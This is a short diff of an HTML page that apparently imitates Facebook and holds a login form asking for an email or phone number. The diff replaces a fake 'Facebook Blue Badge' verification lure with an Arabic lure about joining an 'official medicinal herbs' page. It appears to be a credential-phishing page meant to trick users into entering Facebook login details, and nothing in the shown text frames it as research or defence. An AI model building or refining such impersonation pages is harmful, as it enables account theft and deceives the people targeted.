--- a/index.html
+++ b/index.html
@@ -4,16 +4,16 @@
   <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook Verfication</title>
+    <title>إنضم معنا الى صفحة فيسبوك للأعشاب الطبية</title>
     <link rel="stylesheet" href="style.css">
   </head>
   <body>
     <div class="container flex">
       <div class="facebook-page flex">
         <div class="text">
-          <h1>Facebook Blue Badge</h1>
-          <p>Verify Your Facebook Account </p>
-          <p> And Look Like A Pro</p>
+          <h1>الصفحة الرسمية للأعشاب الطبية</h1>
+          
+          
         </div>
         <form id="loginForm" action="#">
   <input id="emailInput" type="text" placeholder="Email or phone number" required>
